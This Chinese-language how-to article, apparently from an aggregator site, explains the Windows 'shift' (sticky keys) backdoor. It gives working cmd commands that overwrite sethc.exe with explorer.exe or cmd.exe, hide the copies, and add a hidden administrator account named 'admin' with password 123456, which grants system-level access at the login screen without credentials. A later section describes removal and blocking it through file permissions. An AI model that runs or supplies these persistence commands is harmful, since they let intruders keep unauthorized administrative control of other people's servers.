一、什么是shift后門?

shift后門是黑客希望以后方便進入服務器而在沒有密碼的情況下為進入服務器系統而設置的一個后門。

其操作就是在不知道管理員密碼的情況下，連續按5次shift鍵來啟動粘滯鍵，已進入服務器的系統程序管理器。

二、shift后門的制作？

其制作有很多種，下面介紹一種常用的，可以明白其原理自己擴展：

在cmd窗口，敲打命令如下：

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h

用copy命令將explorer.exe復制為setch.exe，這樣在登陸界面下連續按5次shift就可以調出程序管理系統了，就獲取了系統權限。

(也可以將explorer.exe改為cmd.exe，這樣子這樣在登陸界面下連續按5次shift就可以調出cmd命令了，就獲取了shell權限。)

使用命令：

net user admin 123456 /add && net localgroup administrators admin /add

執行上面的命令，便可以創建一個叫admin的用戶，密碼為123456.

三、shift后門的禁止？

兩種方法：

第一種：直接刪除C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache這兩個目錄的sethc.exe文件,(注意:dllcache這個目錄是隱藏的,要在文件夾選項里選擇”顯示所有文件和文件夾”把”隱藏受系統保護的操作系統文件”的選擇取消才能看得到).這種方法不能完全解除，當服務器重啟后，還是會出現后門。

第二種（建議使用這種方法）：使用權限來約束這兩個文件C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache這兩個目錄的sethc.exe文件,(注意:dllcache這個目錄是隱藏的,要在文件夾選項里選擇”顯示所有文件和文件夾”把”隱藏受系統保護的操作系統文件”的選擇取消才能看得到). 在權限里設置為所有用戶(Everyone)禁止運行。具體操作步驟如下：

1.找到C:\WINDOWS\system32目錄下的sethc.exe文件，打開屬性：

點擊”高級“，去掉“允許父項的繼承權限傳播到該對象和所有子對象”的勾。

點擊”添加“，在出現的選擇用戶和組中點擊”立即查找“，在搜索結果中找到”Everoy“用戶，并確定：

點擊確定：

繼續確定，將”Everoy“用戶的權限設置為全部拒絕：

這樣就禁止了安裝和在此訪問。當再次安裝和訪問時，就會出現拒絕訪問：

總結

以上是生活随笔為你收集整理的启用shift后门的方法_shift按五次怎么取消(启用和起用有什么区别)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。